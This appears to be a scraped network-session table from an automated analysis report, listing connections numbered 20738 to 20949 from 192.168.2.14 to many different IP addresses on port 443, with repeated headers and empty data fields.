                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20738192.168.2.1446220210.236.97.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20739192.168.2.1442600189.129.114.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20740192.168.2.145829267.103.25.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20741192.168.2.1434922149.122.67.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20742192.168.2.143725020.201.225.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20743192.168.2.1441668188.120.159.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20744192.168.2.1442850173.28.39.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20745192.168.2.144495450.65.69.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20746192.168.2.14330881.83.144.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20747192.168.2.145923672.108.36.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20748192.168.2.1453966156.229.38.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20749192.168.2.1450368163.167.51.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20750192.168.2.144647265.169.180.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20751192.168.2.1442118113.152.87.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20752192.168.2.1439198187.166.79.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20753192.168.2.143428846.211.160.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20754192.168.2.1441038112.84.127.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20755192.168.2.1454568193.137.199.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20756192.168.2.146080839.68.43.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20757192.168.2.1454374211.236.29.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20758192.168.2.1449256108.0.99.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20759192.168.2.1457242157.23.118.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20760192.168.2.145955043.225.65.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20761192.168.2.1445730116.165.103.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20762192.168.2.1448068164.14.177.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20763192.168.2.1433672159.186.221.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20764192.168.2.1442410152.113.58.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20765192.168.2.145489067.233.113.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20766192.168.2.14484961.52.246.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20767192.168.2.1452000130.218.7.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20768192.168.2.1442472179.156.93.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20769192.168.2.1446260222.80.106.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20770192.168.2.144054651.45.180.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20771192.168.2.1448090122.56.186.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20772192.168.2.1460646119.65.243.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20773192.168.2.143482614.73.145.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20774192.168.2.1453288109.147.148.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20775192.168.2.144715059.102.243.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20776192.168.2.143435641.121.74.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20777192.168.2.1448878159.218.65.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20778192.168.2.1436566142.25.118.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20779192.168.2.1456822109.88.240.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20780192.168.2.1449840149.0.135.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20781192.168.2.145472437.125.36.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20782192.168.2.1432816125.191.138.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20783192.168.2.1435864134.16.5.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20784192.168.2.1447984130.251.102.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20785192.168.2.1437602194.254.161.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20786192.168.2.1434398148.64.254.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20787192.168.2.145029671.209.1.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20788192.168.2.1453878180.67.188.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20789192.168.2.1435434106.26.59.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20790192.168.2.1437994132.105.88.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20791192.168.2.143538653.8.45.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20792192.168.2.1449808206.137.194.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20793192.168.2.1441712102.142.165.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20794192.168.2.144557296.85.205.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20795192.168.2.144426872.86.203.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20796192.168.2.1446658170.89.10.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20797192.168.2.143625020.174.95.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20798192.168.2.1441614170.221.165.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20799192.168.2.145766625.104.193.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20800192.168.2.144848682.152.100.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20801192.168.2.143516249.159.129.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20802192.168.2.1455412149.7.250.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20803192.168.2.1451812144.176.40.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20804192.168.2.144574432.86.198.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20805192.168.2.144884074.208.121.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20806192.168.2.144197285.119.214.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20807192.168.2.143970494.125.17.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20808192.168.2.1435774129.212.114.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20809192.168.2.1458946159.218.182.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20810192.168.2.145089273.19.13.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20811192.168.2.1436882107.174.25.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20812192.168.2.1436936155.43.108.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20813192.168.2.1460730112.106.68.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20814192.168.2.1455274204.16.251.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20815192.168.2.143798245.139.178.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20816192.168.2.143292271.102.51.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20817192.168.2.1443762138.2.26.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20818192.168.2.1455728204.76.153.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20819192.168.2.144562434.169.163.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20820192.168.2.1440544149.90.229.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20821192.168.2.1455532130.194.153.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20822192.168.2.144606671.133.148.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20823192.168.2.1444100106.65.12.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20824192.168.2.1439124206.199.204.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20825192.168.2.1432786196.113.59.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20826192.168.2.14376588.178.39.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20827192.168.2.145340832.54.122.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20828192.168.2.1434842190.151.148.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20829192.168.2.1439038103.107.158.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20830192.168.2.14493764.29.243.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20831192.168.2.1443046137.47.84.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20832192.168.2.1444844109.243.182.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20833192.168.2.1442678142.191.4.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20834192.168.2.1455898219.137.59.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20835192.168.2.1443764133.204.236.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20836192.168.2.145094866.134.28.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20837192.168.2.1453864162.70.94.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20838192.168.2.1432874167.253.83.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20839192.168.2.1453788167.47.202.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20840192.168.2.143715246.183.204.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20841192.168.2.1433324122.18.142.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20842192.168.2.1432898211.13.10.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20843192.168.2.145441438.110.145.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20844192.168.2.1457586162.79.193.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20845192.168.2.145636854.103.236.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20846192.168.2.1433686161.213.94.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20847192.168.2.144453236.188.245.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20848192.168.2.1454948148.99.81.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20849192.168.2.144555835.156.70.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20850192.168.2.143711844.215.230.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20851192.168.2.143871047.102.116.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20852192.168.2.143519499.21.18.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20853192.168.2.1443842172.164.99.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20854192.168.2.1435508131.172.46.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20855192.168.2.1443610124.229.60.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20856192.168.2.144587059.214.8.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20857192.168.2.1455226205.192.133.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20858192.168.2.1452540171.151.143.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20859192.168.2.1446560165.86.199.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20860192.168.2.145282423.94.102.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20861192.168.2.1434470131.163.180.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20862192.168.2.1439944125.129.188.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20863192.168.2.1455458118.240.173.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20864192.168.2.145662832.64.130.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20865192.168.2.145338865.202.120.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20866192.168.2.144746458.113.203.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20867192.168.2.146000843.185.52.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20868192.168.2.1450314124.120.242.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20869192.168.2.1443306138.3.94.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20870192.168.2.1443238178.61.49.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20871192.168.2.144526225.228.217.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20872192.168.2.1436036218.241.118.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20873192.168.2.1439004152.24.60.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20874192.168.2.1450372168.237.246.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20875192.168.2.145320841.83.62.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20876192.168.2.1437488180.152.154.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20877192.168.2.1448246130.131.187.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20878192.168.2.145955659.48.84.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20879192.168.2.1444960106.17.192.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20880192.168.2.1433836203.213.87.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20881192.168.2.1456300106.123.151.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20882192.168.2.1460168104.23.48.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20883192.168.2.143758098.134.174.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20884192.168.2.144185065.65.155.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20885192.168.2.145366087.80.255.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20886192.168.2.1448026182.170.120.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20887192.168.2.145673279.162.9.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20888192.168.2.143768654.81.18.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20889192.168.2.14340062.147.127.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20890192.168.2.1457870109.205.140.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20891192.168.2.1452344117.197.207.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20892192.168.2.1460552164.133.195.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20893192.168.2.145124266.15.78.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20894192.168.2.1438030139.152.203.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20895192.168.2.143600472.153.108.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20896192.168.2.145902685.155.172.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20897192.168.2.1452630163.51.124.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20898192.168.2.1458220133.239.236.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20899192.168.2.144599018.59.106.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20900192.168.2.14581442.190.220.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20901192.168.2.1432962112.209.78.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20902192.168.2.1443816184.190.211.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20903192.168.2.14537402.90.211.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20904192.168.2.1453130125.16.211.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20905192.168.2.145921867.233.117.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20906192.168.2.145218423.171.48.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20907192.168.2.1450098212.0.150.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20908192.168.2.143644442.222.200.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20909192.168.2.1447454165.110.147.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20910192.168.2.1446654162.249.232.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20911192.168.2.143328219.140.189.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20912192.168.2.144188635.83.113.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20913192.168.2.1446060210.152.205.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20914192.168.2.144791634.156.189.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20915192.168.2.1448540150.66.8.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20916192.168.2.1445516119.92.183.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20917192.168.2.144009071.19.255.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20918192.168.2.1436420125.111.48.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20919192.168.2.1451368193.246.17.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20920192.168.2.146095045.53.202.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20921192.168.2.145490693.145.197.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20922192.168.2.144112220.107.133.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20923192.168.2.145944272.136.64.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20924192.168.2.1445634182.159.70.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20925192.168.2.144667678.127.166.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20926192.168.2.1458578102.108.102.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20927192.168.2.1444052206.30.135.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20928192.168.2.144103220.226.78.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20929192.168.2.1459376136.108.209.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20930192.168.2.145880469.201.72.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20931192.168.2.1437786168.119.131.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20932192.168.2.1453754135.184.217.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20933192.168.2.143613287.254.82.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20934192.168.2.1452122119.146.149.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20935192.168.2.145972866.30.20.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20936192.168.2.144739870.28.78.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20937192.168.2.1443670161.35.121.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20938192.168.2.1448946167.85.178.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20939192.168.2.1434208164.59.156.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20940192.168.2.1440620164.221.236.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20941192.168.2.1451606146.147.249.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20942192.168.2.143703665.110.115.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20943192.168.2.1439782157.58.205.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20944192.168.2.1446094155.44.170.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20945192.168.2.143958078.124.136.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20946192.168.2.144842446.140.208.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20947192.168.2.1442080220.58.166.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20948192.168.2.144112419.46.34.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20949192.168.2.1452546186.46.201.34443
                                                        TimestampBytes transferredDirectionData


